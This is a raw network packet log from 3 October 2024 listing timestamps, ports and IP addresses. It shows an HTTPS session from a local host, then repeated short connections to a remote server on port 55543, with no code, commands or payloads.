Oct 3, 2024 09:27:44.877625942 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.911159992 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911200047 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911225080 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911271095 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911446095 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.911446095 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.911457062 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911484003 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911504030 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.911524057 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911549091 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911572933 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.911581993 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.911629915 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.912374020 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.912431955 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.912478924 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.912487030 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.963581085 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.963618994 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970046997 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970087051 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970112085 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970136881 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.970141888 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970156908 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970165014 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.970196009 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.970201015 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970211983 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.970246077 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.970253944 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.971012115 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.971046925 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.971062899 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:44.971077919 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:44.971123934 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.003865004 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.003950119 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.003984928 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.003998041 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.004009962 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.004049063 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.004051924 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.004062891 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.004106045 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.004138947 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.004961967 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.005017042 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.005465031 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.005508900 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.005530119 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.005537033 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.005549908 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.005577087 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.005583048 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.005609035 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.006472111 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.006517887 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.006573915 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.006580114 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.006608963 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.051590919 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.051769972 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.051783085 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.051840067 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.062936068 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.062983036 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063039064 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.063047886 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063064098 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063081026 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.063108921 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.063112974 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063195944 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063235998 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063244104 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.063251019 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.063287020 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.096324921 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.096385002 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.096416950 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.096435070 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.096452951 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.096481085 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.096514940 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.097245932 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.097313881 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.097481012 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.097536087 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.097578049 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.097635984 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.098089933 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.098144054 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.098148108 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.098160028 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.098222971 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.099080086 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099116087 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099137068 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.099143982 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099155903 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099175930 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.099200010 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.099204063 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099245071 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.099870920 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099937916 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099957943 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.099963903 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099975109 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.099982977 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.100003958 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.100008011 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.100035906 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.144284964 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.144431114 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.144474030 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.144524097 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.155561924 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.155653954 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.155723095 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.155775070 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.155811071 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.155822039 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.155842066 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.156030893 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.156089067 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.156096935 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.156158924 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.156487942 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.156543016 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.156557083 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.156594038 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.156616926 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.156622887 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.156641960 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.157478094 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.157516003 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.157542944 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.157550097 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.157582998 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.158297062 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.158360004 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.158368111 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.158412933 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.188985109 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.189033031 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.189095020 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.189141989 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.189162970 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.189183950 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.189430952 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.189469099 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.189492941 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.189502954 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.189531088 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.189572096 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.190632105 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.190651894 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.190717936 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.190730095 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.190777063 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.191570997 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.191590071 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.191649914 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.191663027 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.191699982 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.192492008 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.192507029 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.192574978 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.192586899 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.192629099 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.248208046 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.248234034 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.248353958 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.248389006 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.248435974 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.248644114 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.248661041 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.248703957 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.248714924 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.248743057 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.248761892 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.249084949 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.249104977 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.249154091 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.249166012 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.249197960 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.249221087 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.281632900 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.281657934 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.281817913 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.281846046 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.281899929 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.282278061 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.282295942 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.282335997 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.282350063 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.282361031 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.282402039 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.282459974 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.283179998 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.283198118 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.283271074 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.283283949 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.283324957 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.286534071 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.286556005 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.286660910 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.286674976 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.286716938 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.287031889 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.287048101 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.287090063 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.287097931 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.287113905 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.287136078 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.340940952 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.340965033 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.341083050 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.341118097 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.341181993 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.341244936 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.341263056 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.341324091 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.341330051 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.341372013 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374294043 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374326944 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374399900 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374414921 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374438047 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374459028 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374484062 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374516964 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374541044 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374548912 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374571085 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374588966 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374593973 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374929905 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374952078 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.374986887 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.374994040 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375025988 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.375219107 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375235081 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375271082 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.375277996 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375288963 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.375571012 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375597000 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375622034 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.375629902 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.375653028 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.375998974 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.376018047 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.376060963 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.376069069 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.376099110 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.416621923 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.433626890 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.433655024 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.433715105 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.433737040 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.433758020 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.433783054 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.434076071 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.434093952 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.434132099 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.434139013 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.434165001 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.434185982 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.466912031 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.466934919 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467000008 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467010021 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467047930 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467123985 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467142105 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467169046 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467175007 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467199087 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467216969 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467506886 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467521906 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467559099 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467565060 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467591047 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467603922 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467607021 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467617989 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467650890 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467657089 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467691898 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.467695951 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467725992 CEST	443	49708	188.114.96.3	192.168.2.9
Oct 3, 2024 09:27:45.467765093 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.468147993 CEST	49708	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:27:45.611491919 CEST	49709	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:45.616250992 CEST	55543	49709	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:45.616307020 CEST	49709	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:45.622148991 CEST	49709	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:45.626919985 CEST	55543	49709	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:47.222273111 CEST	55543	49709	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:47.224179029 CEST	49709	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:47.224272013 CEST	49709	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:47.229063988 CEST	55543	49709	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:48.230514050 CEST	49710	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:48.235491037 CEST	55543	49710	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:48.235557079 CEST	49710	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:48.239476919 CEST	49710	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:48.244287014 CEST	55543	49710	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:49.835561037 CEST	55543	49710	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:49.835644960 CEST	49710	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:49.835819960 CEST	49710	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:49.840617895 CEST	55543	49710	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:50.839833021 CEST	49711	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:50.844722986 CEST	55543	49711	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:50.844819069 CEST	49711	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:50.848628998 CEST	49711	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:50.853372097 CEST	55543	49711	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:52.441485882 CEST	55543	49711	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:52.441621065 CEST	49711	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:52.441696882 CEST	49711	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:52.446650982 CEST	55543	49711	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:53.449292898 CEST	49712	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:53.454125881 CEST	55543	49712	45.133.172.96	192.168.2.9
Oct 3, 2024 09:27:53.454200983 CEST	49712	55543	192.168.2.9	45.133.172.96
Oct 3, 2024 09:27:53.457977057 CEST	49712	55543	192.168.2.9	45.133.172.96
